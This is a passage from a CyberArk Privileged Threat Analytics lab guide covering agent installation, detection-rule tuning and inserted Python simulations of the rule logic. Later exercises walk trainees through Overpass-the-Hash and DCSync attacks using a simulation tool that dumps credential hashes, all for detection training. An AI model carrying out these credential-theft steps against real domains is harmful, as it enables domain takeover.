
3. Once the RDP connection is created, browse to the folder C:\PTA Course using
Windows Explorer.

4. Right-click on the file PTA Agent Script Creator.exe and select Run as
administrator.

5. Enter the FQDN of the PTA server – ptaserver.acme.corp – and hit Enter.

6. Leave the default PTA Management Port and PTA Data Port by hitting Enter on
both.

7. Enable PTA server certificate and client authentication by entering y on both.

8. For the subject name of the certificate, enter target-win.acme.corp. This is case
sensitive.

9. Leave the default location %TEMP% for the installation log by entering n.


10. Next say n to leave the default location for the PTA Agent MSI file.

11. Next say y to have PTA Agent analyze Windows events.

12. To exit the configuration tool, hit Enter one last time. This will close the command-line window.

Running the PTA Agent Installer

Now we are going to open the file that was created during the last exercise and run the
command as an administrator. Because the command contains the full path to the MSI
installation file, you can run this from anywhere, but you must run it as administrator.

1. Next go back to the PTA Course folder and open the file PTAAgentInstallerOutput.txt,
do a Select All, and then Copy.

2. Open up a command line session using the option Run as administrator.

3. Paste the contents of the output file into the command line and hit Enter. You will
need to wait a moment for the installation to complete.

Note: It will look as if nothing is happening for a minute or two, but it is working. Be
patient. You should soon see a pop-up CMD window (see image below) that will
auto-dismiss after 5 seconds to inform you that the installation has been successful.

Verifying the installation

1. Open Windows Services (by typing “services.msc” or using the shortcut in the task
bar).

2. A new service called CyberArk Privileged Threat Analytics should now appear with
the status Running.

3. Go to the folder C:\Program Files\CyberArk\PTA Agent and open config.ini.

4. Verify the parameters highlighted in yellow below, making sure that the values are
exactly as shown. If they are not, fix them now, save the file, and restart the PTA
Agent service.

[Forwarder]
Windows_Event_Log=Security
[ServerInfo]
PTA_IP_Address=ptaserver.acme.corp
SSL_Data_Port=6514
SSL_Control_Port=7514
Data_Port=11615
[DCInfo]
Network_Interface_ID=1
Server_Verification_Required=true
Windows_Event_Enabled=true
Network_Enabled=false
[ClientCertificate]
Client_Certificate_Enabled=true
Client_Certificate_Subject_Name=target-win.acme.corp

Note: You will probably have to change the first parameter Windows_Event_Log. The
ForwardedEvents option is used only when the agent is installed on a Windows
Event Forwarding [WEF] Server. Restart the CyberArk Privileged Threat
Analytics service once you have made the change and saved the file.

5. In the same folder, right-click on PTAAgentAdmin.exe and select Run as
administrator.

6. Select 1 to print statistics. You should see output like the following, showing that the
Agent connected successfully to the PTA server.

7. When you are finished, enter q + Enter to exit the tool.

8. Finally, when you close down the RDP session, make sure that you only log out of
the session. Do not shut down the machine by mistake. Click on the Windows Start
menu, then click on the user name Administrator, and click on Sign out.

Note: Log into the PTA Dashboard. You should see that you have a new source of data
labelled SIEM.

Testing the Initial Configuration


In this section, we will be testing the CyberArk Privileged Threat Analytics component.
Both the target CentOS and Windows servers have been configured to forward security
information to the PTA.

First, we need to prepare the environment a little for our exercises. Then we will be
looking at:

• Unmanaged Privileged Access
• Suspected Credential Theft and Automatic Password Rotation
• Suspicious Password Change and Automatic Reconciliation
• Suspicious activities in a session and automatic suspension
• Security Rules Exceptions

Preparing the environment

RootXX Users

We are going to make a small change to the rules for detecting privileged logins to
Unix/Linux servers. By default, the PTA is configured to detect logins from any user
named “root”. We want to catch “root” and every variation of root, such as “root01”,
“root02”, etc.

1. Open up the PTA Dashboard and go to the SETTINGS tab.

2. On the left, click on Privileged Groups and Users.

3. Scroll down the list until you see the entry for the Platform unix and the user root.

4. Double-click the entry and change root to root.* (that is: root, period, asterisk). Click
the Save button.

5. As a last measure, just to make sure that the PVWA updates its configuration, run an
IISRESET. This is not required, but it will help us move more quickly.

Last CyberArk Login

To detect Suspected Credential Theft, the PTA compares the login time on the target
machine with the last time the password was retrieved from the Vault. By default, the PTA
creates a Suspected Credential Theft event if the password was not retrieved within the
last 8 hours (480 minutes). For the purposes of this lab, we will configure the PTA to raise
an alert if the password was not retrieved within the last 3 minutes.

Note: To save time, we are also going to add a parameter that will help us with a later
exercise on Active Directory security and unconstrained delegation.

1. Launch a connection to the ptaserver1 as root from the PVWA.

2. Enter the shortcut “LOCALPARM” (without the quotes). This will open the local
system properties file (/opt/tomcat/diamondresources/local/system.properties) in a
vi-like editor.

3. Add these two new lines to the file (it does not really matter where).

not_via_pim_time_window=3
unconstrained_delegation_accounts_attributes_query_task_trigger=0 */3 * * * ?

Note: If you struggle with vi, don’t panic! You are not alone.
Don’t use the numeric keypad.
Use the Insert button to enter edit mode.
Use the Escape button to exit edit mode.
You can paste from the desktop using a right-click.
:wq to save your changes (colon + w + q).
:q! to panic and exit the file without saving so that you can start again (colon + q + !)

4. To ensure that the change to the local parameters is taken into account, restart the
PTA service with the command:

service appmgr restart

Unmanaged Privileged Access

In this section you will observe how the PTA detects when privileged accounts are being
used and then check if they are being managed by CyberArk. If the account is not
managed, the PTA will generate a security alert and add the account to the list of Pending
Accounts. A Vault administrator can then onboard the account to the relevant safe.
Automatic Onboarding Rules can also be applied starting from CyberArk PAM v11.4.

Note: Due to the constrained resources of our training environment, you will need to wait a
minute or two between restarting the PTA service and provoking an unmanaged
privileged access alert. If the alert does not appear the first time, try it again.

First, we need to establish an SSH session to the target Linux server to create an alert on
the PTA, which we will review using the Security pane in the PVWA.

1. Open PuTTY from the Components server (not through the PVWA – you will find a
shortcut in the toolbar) and open an SSH session to target-lin as root02 (password:
Cyberark1). You can use the PuTTY shortcut Target Linux.

2. Log in to the PVWA as Mike and go to Security > Security Events and verify that
you can see the “Unmanaged privileged account” alert related to root02. Again,
this might take a moment to appear.

Note: This detected event is a result of the change we made earlier to the Privileged
Groups and Users. Because this account matches the regular expression root.*,
the PTA sees this event as an unmanaged privileged access. And because we set
the rule for Unmanaged Privileged Accounts to Add To Pending under the
Security Configurations / Automatic Remediations, this account is now in the
Pending List waiting to be onboarded. You can add other usernames (using
regular expressions) that should also be detected by the PTA as privileged accounts
to be managed by CyberArk PAM.

3. Go to Accounts > Pending & Discovery > Pending Accounts. Select root02 from
the list (use “Refine By” to search for the account if needed) and click on Onboard
Accounts.

4. Onboard the account to the LIN-PTA safe and associate the account with the Linux
via SSH 30 platform.

5. Use the option Set a default password and enter Cyberark1 as the default
password (do not use the Reconcile option).

Suspected Credential Theft and Automatic Password Rotation

In this section you will configure the PTA to detect when privileged accounts are being
used without first retrieving the password from CyberArk PAM and trigger the CPM to
initiate a password change.

1. Log in to the PVWA as Mike and go to POLICIES > Safes. Hover over the LIN-PTA
safe and click on the Members button at the end of the line.

2. Click on Add Member and search for pta in the Vault. This will find both the
PTAUser and the PTAAppUser. First, select the PTAUser. Keep the default
permissions and expand Account Management. Select “Initiate CPM account
management operations” and click on Add.

3. Repeat the step above to add the PTAAppUser to the LIN-PTA safe as well
(including the “Initiate CPM account management operations” permission).

4. Close and exit your PuTTY session to target-lin if it is still open.

By this time, the three minutes that we set with the parameter not_via_pim_time_window
should have expired.

5. Once again, open PuTTY from the Components server (not via the PVWA) and
open an SSH session to target-lin as root02 (the password should still be
Cyberark1).

6. Log in to the PVWA as Mike and go to Security > Security Events and verify that
you can see the “Suspected Credentials Theft” alert related to root02.

7. In the Accounts tab, go to the root02 account and verify that the CPM has changed
the password (or that a change is planned; it may take a couple of minutes).

8. Open the Activities tab to verify that the CPM changed the password after the PTA
detected the suspected credential theft alert and under Activities added the file
category ResetImmediately = ChangeTask.

9. As a final step, go back to the Security Events view and click the Close button. A
pop-up will ask you to confirm the action. Click Close Event to inform the PTA that
the incident has been handled.

Suspicious Password Change and Automatic Reconciliation

In this section you will configure the PTA to detect when a password is changed manually,
bypassing the CPM, and have the PTA trigger the CPM to reconcile the password.

For this exercise to work, we have configured the existing account root01 as a reconcile
account for the platform Linux via SSH 30.

1. Log in to the PVWA as Mike and go to Accounts > Accounts View, select the root02
account, and launch an SSH connection via the PSM.

2. Type the following command to change the password of root02 back to Cyberark1:

passwd root02

3. Go back to the PVWA as Mike and go to Security > Security Events. You should
be able to see two new alerts: one for “Suspicious activities detected in a
privileged session”, and one for “Suspicious password change”.

Explanation: Because the platform has automatic reconciliation configured, and we have
configured the PTA to trigger a reconciliation when a suspicious password change is
detected, the password will be changed from the one set by the user to a random
one known only to the Vault.

4. Still in the Security Events view, click on the Session ID. This will bring us to the
Monitoring view where we can see additional information about the session in
question, which is still running.

5. Here we have the possibility to terminate the session, thereby cutting off the
attacker’s access; to suspend the session if we are not sure that it is an attack; to
resume a previously suspended session; and to monitor sessions live. We have
already seen this functionality in the PAM Administration training, so just click
Terminate to end the session. You will have to click on the RDP file sent to Mike to
terminate the PuTTY session.

6. Go to Accounts > Accounts View and select root02. Verify that root02 was indeed
reconciled by the CPM (remember that a reconcile may take a little longer than a
password change).

You may see a message like the one below. This is misleading; just be patient.

Note: If for some reason you do not see the automatic reconcile, check your security
configuration to make sure that automatic rotation is activated for suspicious
credential theft.

Suspicious activities in a Windows session and automatic suspension

In this section, we will configure a rule that says that if anyone opens the application used
to manage our email server, that session will be suspended. Before we begin, let’s just
make sure that everything is ready for this exercise.

First, go to Options → Privileged Session Management → General Settings → Server
Settings → Live Sessions Monitoring Settings and make sure the parameter
MonitoringLevel is set to Control. We checked this earlier, so it should be correct.

Now log into the PrivateArk Client and browse to Tools → Administrative Tools → Users
and Groups and make sure that the AD group CyberArk Vault Admins is a member of
the groups Auditors and PSMLiveSessionTerminators. This should also be the case,
but it never hurts to check.

Create the Rule

1. Log on to the PVWA as Mike and go to Security > Security Configurations.

2. Under Privileged Session Analysis and Response, click on Add rule.

3. In Category, select Windows titles.

4. In the Pattern field enter (.*)MailEnableAdmin(.*)

5. In the Description field enter This is to prevent unauthorized use of the Email
Server Admin Console.

6. In the Session Response field, select Suspend, ensure that the status is Active,
and click Add.

7. In the Score field enter 99 (this is serious!).

Test the Rule

John is a Windows administrator and is going to test our new rule.

1. For convenience, leave open the first PVWA session and log into the PVWA again
using another browser or a new incognito session with the LDAP username John and
the password Cyberark1.

2. Go to the Accounts view and locate the credentials for the domain account
administrator on acme.corp and launch a PSM connection to the Domain Controller
dc01.acme.corp.

3. Open the Windows Start menu and select MailEnable. This is the administration
tool for the email server.

4. Your RDP session will be suspended.

5. Go back to the PVWA session you opened as Mike and go to Security Events and
look for these recent events.

6. Click on the Resume button to allow John to shut down the offending application.
Go back to the RDP session for DC01, close the MailEnable application, and log off
the machine (do NOT shut down the machine).

Tip: If you want to give John the right to edit the email server, you could create an
exception for him in the rules.

You can close John’s connection to the PVWA.

Suspicious activities in an SSH session and automatic termination

In this section you will configure the PTA to detect when a risky command is used in a
privileged session and to terminate the session automatically.

1. Log in to the PVWA as Mike and go to Security > Security Configurations >
Privileged Session Analysis and Response. Find the SSH rule for the passwd
command (the *Nix command for changing passwords) and click on Edit.

2. Configure the risk to a score of 95 and the Session Response to Terminate. Click
on Save.

3. Go to Accounts > Accounts View and select the root02 account. Launch a
privileged session by clicking on the Connect button.

4. When the session opens, try to run the passwd root02 command again. The
session should close immediately when you hit Enter.

5. Back in the PVWA, verify that you can see the recent security alerts and that the
last session got a score of 95. You can close this event and any others that we have
already managed.

Security Rules Exceptions

In this section, we will tweak the rule we created in the last section so that if a designated
user needs to execute passwd during a session, their session will not be terminated.

1. Go back to Security > Security Configurations, select the passwd rule, and click
the Edit button.

2. To create an exception to the rule, click on Change scope.

3. Enter the user name Carlos in the field, hit Enter (this is required to enter the user
name into the field), and then click the Change Scope button. You will then be
returned to the Edit Rule dialogue. Click Save to close the dialogue.

4. To test the rule, you can log in to the PVWA as the user Carlos and run the passwd
command against any of the accounts in the LIN-PTA safe. Your session should not
be terminated.

Note: Because we have set a rule to reconcile any account that is changed outside of the
CPM, any account modified in this way will automatically be reconciled.
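The three session rules exercised above (the MailEnableAdmin window-title rule with Suspend, the passwd SSH rule with Terminate, and the scope exception for Carlos) can be modelled as a small rule evaluator. This is an added Python example, not CyberArk code; the passwd regular expression is an assumption, since the guide edits a pre-existing rule without showing its pattern, and the activities it evaluates are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple


@dataclass
class SessionRule:
    """One entry under Security Configurations > Privileged Session Analysis and Response."""
    category: str     # "Windows titles" or "SSH commands"
    pattern: str      # regular expression, as typed into the Pattern field
    score: int        # risk score (the guide uses 99 and 95)
    response: str     # "Suspend", "Terminate" or "None"
    description: str = ""
    active: bool = True
    excluded_users: Set[str] = field(default_factory=set)  # users added via "Change scope"

    def matches(self, category: str, text: str, user: str) -> bool:
        # Scope is checked first: a user excluded from the rule never triggers it, whatever
        # they type.  A manual passwd change by that user is still caught by the reconcile
        # rule the guide's note mentions; that is a separate, account-level response.
        if not self.active or self.category != category or user in self.excluded_users:
            return False
        return re.fullmatch(self.pattern, text) is not None


@dataclass
class SessionActivity:
    session_id: str
    user: str       # PVWA user who opened the PSM session
    category: str   # same vocabulary as SessionRule.category
    text: str       # observed window title or typed SSH command line


def evaluate_activity(activity: SessionActivity,
                      rules: List[SessionRule]) -> Tuple[int, Optional[str]]:
    """Return (score, response) of the highest-scoring matching rule, or (0, None)."""
    hits = [r for r in rules if r.matches(activity.category, activity.text, activity.user)]
    if not hits:
        return 0, None
    top = max(hits, key=lambda r: r.score)
    return top.score, top.response


# Rules as configured in the guide.  The passwd pattern is assumed: the guide edits an
# existing SSH rule without showing its expression, so this one requires "passwd" to be a
# whole word of the command (a prefix such as "sudo" is allowed, "/etc/passwd" is not).
LAB_RULES = [
    SessionRule("Windows titles", r"(.*)MailEnableAdmin(.*)", 99, "Suspend",
                "This is to prevent unauthorized use of the Email Server Admin Console."),
    SessionRule("SSH commands", r"(.*\s)?passwd(\s.*)?", 95, "Terminate",
                "passwd command", excluded_users={"Carlos"}),
]

# Constructed activities replaying the guide's tests, plus two edge cases.
LAB_ACTIVITIES = [
    SessionActivity("s1", "John", "Windows titles", "MailEnableAdmin - [Console Root]"),
    SessionActivity("s2", "Mike", "SSH commands", "passwd root02"),
    SessionActivity("s3", "Carlos", "SSH commands", "passwd root02"),   # scope exception
    SessionActivity("s4", "Mike", "SSH commands", "cat /etc/passwd"),   # word inside a path
    SessionActivity("s5", "Mike", "SSH commands", "sudo passwd root03"),
]


def run_lab_scenario() -> List[Tuple[str, int, Optional[str]]]:
    """Evaluate every constructed activity and return (session_id, score, response)."""
    return [(a.session_id, *evaluate_activity(a, LAB_RULES)) for a in LAB_ACTIVITIES]
```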

Automatic Onboarding Rules

The PTA can also be configured to onboard newly discovered privileged accounts
automatically through the use of Onboarding Rules. In order to do this, we need to give
the PTA users (PTAAppUser and PTAUser) access to the target Safe so that they can
create and modify accounts.

Modify the target Safe permissions

1. Return to the PVWA, log in as Mike, and go to Policies -> Safes.

2. Select the Safe LIN-PTA and click on the Members button.

3. Modify the rights for the Vault users PTAAppUser and PTAUser by adding the
following Safe authorizations:

• Add Accounts (includes update properties)
• Update account content
• Update account properties
• Rename accounts

Create a new rule

1. Next click on Accounts -> Onboarding Rules and create a new rule using the
wizard with the following parameters:

Parameter                Value
System type              *NIX
Machine type             Any
Account type             Local
Account category         Any
Privileged account type  Any
Platform                 Linux via SSH 30
Safe                     LIN-PTA
Name                     Onboard to LIN-PTA

With this rule, when the PTA detects the use of a new unmanaged Unix or Linux account,
it will automatically add the account to CyberArk PAM and place it in the LIN-PTA Safe.

Test the rule

1. Open a new PuTTY session (not via the PVWA) to the Target Linux machine at
10.0.0.20 with root03 and password Cyberark1.

2. Now go back to the PVWA and Security > Security Events. You should see a new
event with a risk score of 30 and an indication that remediation has been initiated.
The account has been automatically onboarded and reconciled thanks to our rule.

Note: This may take a moment, so be patient.

3. Next, go to the Accounts tab in PVWA and find the recently onboarded root03
account and verify that it has been onboarded and reconciled.

4. Don’t forget to close the event in the Security Events window.
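The detections exercised in the Unmanaged Privileged Access, Suspected Credential Theft and Automatic Onboarding Rules sections follow one decision sequence, which this added Python example replays over constructed login events; it is not CyberArk code. Whole-name matching for root.*, treating every candidate as a Local account, and the timestamps used in the scenario are assumptions.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set, Tuple

# Lab settings from the guide: the "unix" entry under Privileged Groups and Users is
# changed from root to root.*, and not_via_pim_time_window=3 (the product default is 480).
PRIVILEGED_PATTERNS = {"unix": [re.compile(r"root.*")]}
NOT_VIA_PIM_TIME_WINDOW_MIN = 3
SYSTEM_TYPE = {"unix": "*NIX", "windows": "Windows"}  # platform family -> rule "System type"
AccountKey = Tuple[str, str]  # (username, address)


@dataclass
class ManagedAccount:
    username: str
    address: str
    safe: str
    platform: str
    last_retrieval: Optional[datetime]  # last password retrieval from the Vault, if any


@dataclass
class LoginEvent:
    username: str
    address: str
    platform: str  # "unix" for the lab's target Linux host
    timestamp: datetime


@dataclass
class OnboardingRule:
    name: str
    system_type: str   # "*NIX", "Windows" or "Any"
    account_type: str  # "Local", "Domain" or "Any"
    platform: str      # CyberArk platform to assign, e.g. "Linux via SSH 30"
    safe: str          # target Safe, e.g. "LIN-PTA"


def is_privileged(platform: str, username: str) -> bool:
    """Match the login name against the privileged-user patterns for its platform.
    Whole-name matching is an assumption of this simulation, not documented PTA behaviour."""
    return any(p.fullmatch(username) for p in PRIVILEGED_PATTERNS.get(platform, []))


def evaluate_login(event: LoginEvent, managed: Dict[AccountKey, ManagedAccount],
                   pending: Set[AccountKey], rules: List[OnboardingRule]
                   ) -> Optional[Tuple[str, str]]:
    """Return (alert, remediation) for one login, or None, updating managed/pending state.

    Unmanaged privileged account: auto-onboard if an Onboarding Rule matches, else add to
    Pending Accounts.  Managed account used without a Vault retrieval inside the window:
    Suspected Credentials Theft, with an immediate CPM password change requested.
    """
    if not is_privileged(event.platform, event.username):
        return None
    key = (event.username, event.address)
    account = managed.get(key)
    if account is None:
        # The lab only exercises local accounts, so every candidate is treated as "Local".
        rule = next((r for r in rules
                     if r.system_type in ("Any", SYSTEM_TYPE.get(event.platform))
                     and r.account_type in ("Any", "Local")), None)
        if rule is None:
            pending.add(key)
            return ("Unmanaged privileged account", "Add To Pending")
        # Auto-onboarded and reconciled: the Vault now holds a password nobody has retrieved.
        managed[key] = ManagedAccount(event.username, event.address, rule.safe, rule.platform, None)
        return ("Unmanaged privileged account", f"Onboard and reconcile ({rule.name})")
    window = timedelta(minutes=NOT_VIA_PIM_TIME_WINDOW_MIN)
    if account.last_retrieval is None or event.timestamp - account.last_retrieval > window:
        return ("Suspected Credentials Theft", "ResetImmediately=ChangeTask")
    return None


def run_lab_scenario() -> List[Optional[Tuple[str, str]]]:
    """Replay the guide's sequence with constructed timestamps and return each verdict."""
    t0 = datetime(2022, 3, 21, 9, 0)
    lin = "target-lin"
    managed: Dict[AccountKey, ManagedAccount] = {
        ("root01", lin): ManagedAccount("root01", lin, "LIN-PTA", "Linux via SSH 30", t0)}
    pending: Set[AccountKey] = set()
    rules: List[OnboardingRule] = []

    def login(user: str, minutes: int) -> Optional[Tuple[str, str]]:
        event = LoginEvent(user, lin, "unix", t0 + timedelta(minutes=minutes))
        return evaluate_login(event, managed, pending, rules)

    verdicts = [login("root02", 0)]      # PuTTY login, account unknown to the Vault -> pending
    # Mike onboards root02 from the Pending list; constructed: he retrieves the password at t0+1.
    managed[("root02", lin)] = ManagedAccount("root02", lin, "LIN-PTA", "Linux via SSH 30",
                                              t0 + timedelta(minutes=1))
    verdicts.append(login("root02", 5))  # 4 min after retrieval: outside the 3-min window
    verdicts.append(login("root01", 2))  # 2 min after retrieval: inside the window, no alert
    verdicts.append(login("mike", 2))    # does not match root.*: not a privileged login
    rules.append(OnboardingRule("Onboard to LIN-PTA", "*NIX", "Local", "Linux via SSH 30", "LIN-PTA"))
    verdicts.append(login("root03", 6))  # rule matches: onboarded without a human in the loop
    return verdicts
```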

Installing the Agent on a Domain Controller


In this section we will be installing the PTA Agent on the DC01 server. This is required in
order to detect Kerberos related attacks.

Note: The PTA Agent on a domain controller (or the Network Sensor machine) is not
part of the Core PAM basic license and requires an additional license.

Installing the PTA Agent

Now we are ready to install the PTA Agent on the domain controller. This process is
similar, although not identical, to installing the Agent on a regular Windows server.

As when we installed the PTA Agent on a Windows server, this process is divided into two
tasks:

• Running the PTA Agent Script Creator
• Running the PTA Agent Installer

Running the PTA Agent Script Creator

1. Launch a PSM connection with the administrator account to dc01 in the PVWA.

2. Browse to the folder C:\PTA Course using Windows Explorer.

3. Launch PTA Agent Script Creator.exe using Run as administrator.

4. Enter your PTA address ptaserver.acme.corp and hit Enter.

5. Leave the default PTA Management Port and PTA Data Port by hitting Enter on
both.

6. We are going to authenticate both our server and our client, so enter Y for server
authentication and for client authentication, and, for the Subject Name, enter exactly
ptaagent (this is linked to a certificate created specifically for this purpose in this
lab).

Note: This field is case sensitive.

7. Leave the default location “%TEMP%” for the installation log by entering n.

8. Next type n to leave the default location for the PTA Agent MSI file.

9. Next type n to have PTA Agent analyze network traffic.

10. Hit Enter to exit the command line.

Running the PTA Agent Installer

1. Next go back to the PTA Course folder and open the file PTAAgentInstallerOutput.txt.

2. Open a command window as administrator (“Run as Administrator”), copy the
contents from the output file, and run it (make sure you run as administrator).

3. As before, you will need to wait a moment for the installation to complete.

Note: You should see a pop-up CMD window appearing that will auto-dismiss in 5 seconds
to inform you that the installation has been successful.

4. Open the Services window and you should see a new service called CyberArk
Privileged Threat Analytics with the status Started.

5. Open the properties for the service and change the Startup type from Automatic to
Automatic (Delayed Start).

6. In the Recovery tab, change the response to First failure to Restart the service.

These changes will help ensure the continuity of the service in the event the server is
restarted.

Verifying

1. Go to C:\Program Files\CyberArk\PTA Agent folder.

2. Open the file config.ini and verify the values highlighted in yellow below. If the
information is not exactly as shown, correct it in the file, save your changes, and then
restart the service.

[Forwarder]
Windows_Event_Log=ForwardedEvents
[ServerInfo]
PTA_IP_Address=ptaserver.acme.corp
SSL_Data_Port=6514
SSL_Control_Port=7514
Data_Port=11615
[DCInfo]
Network_Interface_ID=1
Server_Verification_Required=true
Windows_Event_Enabled=false
Network_Enabled=true
[ClientCertificate]
Client_Certificate_Enabled=true
Client_Certificate_Subject_Name=ptaagent

3. Right click on PTAAgentAdmin.exe and select Run as administrator.

4. Enter 1 to print statistics. You should see output like the following, showing that the
Agent connected successfully to the PTA server.

5. Return to the PTA Dashboard; at the bottom you should see all five input sources:
Vault, SIEM, Unix, Network Sensor, and AD.

Note: You may need to restart your PTA server for the dashboard to be refreshed. Run
“service appmgr restart” on the PTA command line.
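The two config.ini listings in this guide (the regular Windows server and the domain controller) differ in four keys, and the guide insists on exact values. This added Python check, not a CyberArk tool, compares a config.ini body against the expected values for either role; the role names windows-server and domain-controller and the sample file are constructed.

```python
import configparser
from typing import Dict, List, Tuple

Key = Tuple[str, str]  # (section, option)

# Expected values copied from the guide, common to both agent roles.
COMMON: Dict[Key, str] = {
    ("ServerInfo", "PTA_IP_Address"): "ptaserver.acme.corp",
    ("ServerInfo", "SSL_Data_Port"): "6514",
    ("ServerInfo", "SSL_Control_Port"): "7514",
    ("ServerInfo", "Data_Port"): "11615",
    ("DCInfo", "Network_Interface_ID"): "1",
    ("DCInfo", "Server_Verification_Required"): "true",
    ("ClientCertificate", "Client_Certificate_Enabled"): "true",
}

# Values that differ between the regular Windows server and the domain controller.
ROLE_SPECIFIC: Dict[str, Dict[Key, str]] = {
    "windows-server": {
        ("Forwarder", "Windows_Event_Log"): "Security",
        ("DCInfo", "Windows_Event_Enabled"): "true",
        ("DCInfo", "Network_Enabled"): "false",
        ("ClientCertificate", "Client_Certificate_Subject_Name"): "target-win.acme.corp",
    },
    "domain-controller": {
        ("Forwarder", "Windows_Event_Log"): "ForwardedEvents",
        ("DCInfo", "Windows_Event_Enabled"): "false",
        ("DCInfo", "Network_Enabled"): "true",
        ("ClientCertificate", "Client_Certificate_Subject_Name"): "ptaagent",
    },
}


def check_config(text: str, role: str) -> List[str]:
    """Compare a config.ini body against the expected values for the given role.

    Returns one message per mismatch or missing key; an empty list means the file is as
    the guide shows it.  Comparison is exact (case included), because the certificate
    subject name must match the certificate exactly.
    """
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep option names case-sensitive instead of lower-casing them
    parser.read_string(text)
    expected = {**COMMON, **ROLE_SPECIFIC[role]}
    problems: List[str] = []
    for (section, option), want in expected.items():
        if not parser.has_option(section, option):
            problems.append(f"[{section}] {option} is missing")
        elif parser.get(section, option) != want:
            got = parser.get(section, option)
            problems.append(f"[{section}] {option}={got!r}, expected {want!r}")
    return problems


def check_file(path: str, role: str) -> List[str]:
    # Installed location from the guide: C:\Program Files\CyberArk\PTA Agent\config.ini
    # utf-8-sig tolerates a BOM, which Windows editors often write.
    with open(path, encoding="utf-8-sig") as fh:
        return check_config(fh.read(), role)


# Constructed sample: a fresh install on the Windows server, where the guide warns that
# Windows_Event_Log still reads ForwardedEvents and must be changed to Security.  The
# subject name also has the wrong case, to show that the comparison is case-sensitive.
FRESH_WINDOWS_SERVER_INI = """\
[Forwarder]
Windows_Event_Log=ForwardedEvents
[ServerInfo]
PTA_IP_Address=ptaserver.acme.corp
SSL_Data_Port=6514
SSL_Control_Port=7514
Data_Port=11615
[DCInfo]
Network_Interface_ID=1
Server_Verification_Required=true
Windows_Event_Enabled=true
Network_Enabled=false
[ClientCertificate]
Client_Certificate_Enabled=true
Client_Certificate_Subject_Name=Target-Win.acme.corp
"""
```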

Running AGENTSHELL

1. Launch a connection to the PTAServer1 as root and run AGENTSHELL.

Note: AGENTSHELL is similar to PTAAgentAdmin.exe, but it allows you to check
connectivity to your PTA agents from the PTA Server. You should now see both
agents appearing.

2. Enter the IP address for the domain controller: 10.0.0.1 and hit Enter. Then enter 1
and Enter to show statistics.

Note: You may observe a number of failed connection attempts in the statistics. This is
the PTA Agent attempting to connect to the second PTA server, which is not yet
online.

3. Enter a to change target and perform the same test for 10.0.21.1 to check for agent
connectivity. When you are finished, enter q to quit.

Kerberos Attacks

In this section, we are going to run a number of attack-simulation tools to generate data for
capture by our Network Sensor and for analysis by the PTA. The attacks we will simulate
are:

• Overpass-the-Hash
• DCSync
• Golden Ticket

Note: Before running these exercises, verify that the CyberArk Privileged Threat
Analytics service is up and running on the domain controller DC01.

Overpass-the-Hash

Our friend John wants to be able to connect with his Active Directory account to Target-Win
so that he can perform administrative tasks on that server without bothering to go
through CyberArk PAM (bad John!), so he has added himself to the local administrator
group.

Unfortunately, John is not too careful. He got phished and someone was able to get his
password. That person is going to log in to Target-Win and wait for a domain
administrator to log in so that she can grab the hash and connect to the domain controller.

The purpose of this exercise is to demonstrate the risks of not following best practice,
and to show how CyberArk can protect an organization from this kind of behavior and
from the attacks to which it exposes your organization.

Allow the PTA to perform automatic password rotation

We performed this task earlier for the LIN-PTA safe. Now we are going to do it for the
Safe where our Windows accounts are stored.

1. Go to the Policies > Safes window, click the Win-PTA safe, and then click
Members.

2. Click Add Member and search for the PTAUser.

3. Give the user the same rights as we did on the Safe LIN-PTA.

4. Repeat the steps to add PTAAppUser with the same rights.


The attack begins

Now the attacker performs her reconnaissance. She is going to connect to Target-Win
with the password she phished from John.

1. Go to the Skytap environment view and click on the server labelled Target Windows.
This is the machine Target-Win.


2. Log in as the domain user John with the password Cyberark1.

3. Open Windows Explorer and browse to c:\KAG_V5, right-click on the Windows batch
file KerberosAttacksGenerator.bat and select Run as administrator.

4. Now wait for your victim.

The victim connects

Tom, who has access to a domain administrator account, wants to perform some
maintenance on target-win.

1. On Components, connect to the PVWA as tom and launch a connection with the
account admin01 to the machine target-win.

2. Do not close the RDP session; leave it open. You don’t need to do anything in it.

The hash of admin01’s account is now in the system memory of target-win. Admin01 is a
domain administrator, so if the hacker can grab that hash, she can use it to get a foothold
on the domain controller.

The attack continues

1. Return to the attacker’s session as John on target-win. In the PowerShell window,
after the tool checks the pre-requisites, enter 1 and hit Enter to launch an
Overpass-the-Hash attack.


2. The tool will then scan the memory for credentials. It should find admin01, among
others, with each credential assigned a number. Enter the number associated with
the admin01 account. In the example below, this is number 1, but on your system it
might be different.

3. Next, the tool proposes to use 1 – AES hash, 2 – NTLM hash, or 3 – both. Enter 3
to send both hashes (this will also increase our chances of success).


4. If successful, a new CMD window will open with a remote session on the domain
controller using the credentials of admin01 (make sure you get the new shell; otherwise
the attack was not successful, and you will not see an event in the PTA Dashboard).

Note: You may need to run this a second time if it does not work the first.

The response

1. Go back to the PVWA as Mike, go to Security > Security Events and look for this
event. Notice the message “Initiated remediation”. This indicates that CyberArk has
performed an automatic action in response to this event.


2. Go to Accounts > Accounts View and locate the admin01 account. You should see
that the password has been changed.

Note: As a follow-up to this, the security operations team would have to identify and
terminate the remote session initiated by the hacker with the stolen password.
Also, it would probably be a good idea to restrict access to domain administrator
accounts and to limit those accounts only to servers where they have legitimate
business.


DCSync

For this exercise, we are going to use DCSync. This technique allows an attacker to
mimic the behavior of another domain controller and to induce the real controller to share
information about the password history of a particular account in the form of hashes. If the
attacker is then able to crack the hashes, she will have an idea of the administrator’s
strategy for generating passwords and may be able to guess the next one.

For this operation, we will imagine that a hacker has the credentials of a user who can
synchronize a domain controller. A domain admin can do that.

The attack

1. Log on to target-win again through Skytap, but this time use the account admin02.

2. Run the Kerberos Attacks Generator batch file with the option Run as
administrator as we did before, bypassing execution policy. The KAG is in
c:\KAG_V5.

3. This time enter option 4 for DCSync.

4. Enter the name of the account for which you want to retrieve the information:
administrator and watch the results.


The attack has been successful and the attacker now has a wealth of data about the
domain administrator account.

5. Enter 9 to close the KAG tool.

The response

1. Log in to PVWA as Mike and look for this recent event under Security Events.


There are two entries related to this attack. The first one is an unmanaged privileged
account notification. This tells us that someone logged into target-win using a privileged
account – admin02 – that is not under CyberArk PAM management. The next step would
be to onboard this account and perform a password change.

The second notification informs us of the DCSync attack. When seen in the context of the
previous message, this becomes an extremely high-risk event and must be dealt with
immediately. We would need to terminate admin02’s session, find out which accounts
were compromised, and rotate them.

As a final step, you would return to Security Events and close the event.

Golden Ticket

In this section we will detect a Golden Ticket attack. In a Golden Ticket attack, the attacker
